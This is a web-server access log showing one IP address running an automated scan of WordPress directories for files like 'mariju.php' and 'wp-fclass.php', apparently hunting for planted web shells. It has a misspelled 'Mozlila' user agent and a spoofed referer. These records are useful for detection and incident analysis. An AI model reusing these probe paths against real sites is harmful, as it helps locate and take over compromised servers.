128.199.106.124 - - [12/Aug/2025:05:22:54 -0400] "GET /wp-includes/IXR/mariju.php HTTP/1.1" 301 257 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
128.199.106.124 - - [12/Aug/2025:05:22:54 -0400] "GET /.well-known/acme-challenge/mariju.php HTTP/1.1" 301 268 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
128.199.106.124 - - [12/Aug/2025:05:22:55 -0400] "GET /images/mariju.php HTTP/1.1" 301 248 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
128.199.106.124 - - [12/Aug/2025:05:22:55 -0400] "GET /wp-includes/php-compat/mariju.php HTTP/1.1" 301 264 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
128.199.106.124 - - [12/Aug/2025:05:22:55 -0400] "GET /wp-admin/maint/mariju.php HTTP/1.1" 301 256 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
128.199.106.124 - - [12/Aug/2025:05:22:56 -0400] "GET /wp-includes/ID3/mariju.php HTTP/1.1" 301 257 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
128.199.106.124 - - [12/Aug/2025:05:22:56 -0400] "GET /wp-admin/includes/mariju.php HTTP/1.1" 301 259 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
128.199.106.124 - - [12/Aug/2025:05:22:56 -0400] "GET /.well-known/pki-validation/mariju.php HTTP/1.1" 404 - "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
128.199.106.124 - - [12/Aug/2025:05:22:56 -0400] "GET /wp-includes/customize/mariju.php HTTP/1.1" 301 263 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
128.199.106.124 - - [12/Aug/2025:05:22:57 -0400] "GET /wp-admin/network/mariju.php HTTP/1.1" 301 258 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
128.199.106.124 - - [12/Aug/2025:05:22:57 -0400] "GET /wp-content/plugins/wp-help/admin/wp-fclass.php HTTP/1.1" 301 277 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
128.199.106.124 - - [12/Aug/2025:05:22:58 -0400] "GET /wp-content/plugins/wp-help/index.php HTTP/1.1" 301 267 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
